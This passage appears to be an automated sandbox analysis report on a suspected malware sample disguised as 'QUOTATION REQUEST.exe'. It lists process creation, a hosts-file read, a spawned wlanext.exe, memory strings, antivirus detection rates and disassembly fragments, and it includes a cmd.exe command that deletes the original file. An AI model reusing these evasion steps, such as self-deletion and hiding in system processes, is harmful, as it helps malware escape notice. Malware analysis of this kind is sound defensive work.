          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: QUOTATION REQUEST.exeVirustotal: Detection: 18%
          Source: QUOTATION REQUEST.exeReversingLabs: Detection: 34%
          Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION REQUEST.exe 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess created: C:\Users\user\Desktop\QUOTATION REQUEST.exe C:\Users\user\Desktop\QUOTATION REQUEST.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess created: C:\Users\user\Desktop\QUOTATION REQUEST.exe C:\Users\user\Desktop\QUOTATION REQUEST.exeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: QUOTATION REQUEST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: QUOTATION REQUEST.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe
          Source: Binary string: wlanext.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 0_2_002394E5 push cs; iretd 0_2_002394E6
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0041C93F pushad ; ret 3_2_0041C943
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0041C9F4 push 1B579E0Eh; ret 3_2_0041CA15
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_00415249 push ebx; iretd 3_2_0041524C
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_004152D2 push 59027665h; retf 3_2_004152E2
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_00413348 push ds; iretd 3_2_00413349
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0041B3B5 push eax; ret 3_2_0041B408
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0040D441 push EB161335h; ret 3_2_0040D446
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0041B46C push eax; ret 3_2_0041B472
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0041B402 push eax; ret 3_2_0041B408
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0041B40B push eax; ret 3_2_0041B472
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0041B499 push eax; ret 3_2_0041B472
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0041B499 push eax; ret 3_2_0041B472
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_00C494E5 push cs; iretd 3_2_00C494E6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0364D0D1 push ecx; ret 9_2_0364D0E4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EEC9F4 push 1B579E0Eh; ret 9_2_00EECA15
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EEC93F pushad ; ret 9_2_00EEC943
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EE52D2 push 59027665h; retf 9_2_00EE52E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EE5249 push ebx; iretd 9_2_00EE524C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EEB3B5 push eax; ret 9_2_00EEB408
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EE3348 push ds; iretd 9_2_00EE3349
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EEB499 push eax; ret 9_2_00EEB472
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EEB499 push eax; ret